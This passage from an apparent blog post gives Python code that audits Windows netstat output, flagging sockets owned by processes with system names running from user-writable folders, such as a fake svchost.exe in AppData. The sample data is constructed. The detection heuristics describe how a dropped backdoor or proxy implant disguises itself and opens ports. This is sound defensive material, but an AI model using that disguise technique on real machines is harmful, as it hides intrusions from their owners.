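    """Parse the data rows of `netstat -ano`; header and banner lines are skipped."""
    out = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            out.append(Socket(proto, local, remote, state or "", int(pid)))
    return out


def image_reasons(image: str) -> List[str]:
    """Reasons the owning process's image path is suspicious (empty = nothing to say)."""
    low = image.lower()
    reasons = []
    if any(marker in low for marker in USER_WRITABLE):
        reasons.append("image_in_user_writable_dir")
    name = low.rsplit("\\", 1)[-1]
    if name in SYSTEM_NAMES and not low.startswith("c:\\windows\\"):
        reasons.append("system_name_outside_windows")
    return reasons


def audit_sockets(netstat_text: str, processes: Dict[int, str]) -> List[Finding]:
    """Report every socket whose owning process looks out of place."""
    findings = []
    for s in parse_netstat(netstat_text):
        image = processes.get(s.pid, "<unknown>")
        reasons = image_reasons(image)
        if not reasons:
            continue
        # A listener is what a proxy/backdoor opens; an established socket is its beacon.
        role = "listener" if s.state == "LISTENING" or s.proto == "UDP" else "outbound_connection"
        findings.append(Finding(s.pid, image, s, [role] + reasons))
    return findings


# Constructed sample of `netstat -ano` output (documentation-range addresses), not real data.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       4120
  TCP    192.168.1.20:49712     203.0.113.7:443        ESTABLISHED     2876
  TCP    192.168.1.20:49730     198.51.100.9:81        ESTABLISHED     4120
  UDP    0.0.0.0:5353           *:*                                    1480
"""
# Constructed PID -> image path table, as `Get-Process | Select Id, Path` would give it.
SAMPLE_PROCESSES = {
    912: r"C:\Windows\System32\svchost.exe",
    1480: r"C:\Windows\System32\svchost.exe",
    2876: r"C:\Program Files\Mozilla Firefox\firefox.exe",
    4120: r"C:\Users\alice\AppData\Roaming\sys\svchost.exe",
}

if __name__ == "__main__":
    for f in audit_sockets(SAMPLE_NETSTAT, SAMPLE_PROCESSES):
        print(f"pid {f.pid} {f.image}: {f.socket.local} -> {f.socket.remote} "
              f"[{f.socket.state or f.socket.proto}] {', '.join(f.reasons)}")
```

The two heuristics are deliberately narrow so that the output stays short on a healthy machine; what they catch is exactly the combination the earlier post relies on, a file dropped under %AppData% with a familiar name that then opens a port. Anything reported should be checked against the file's signature and the path of the real system binary before acting on it.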
 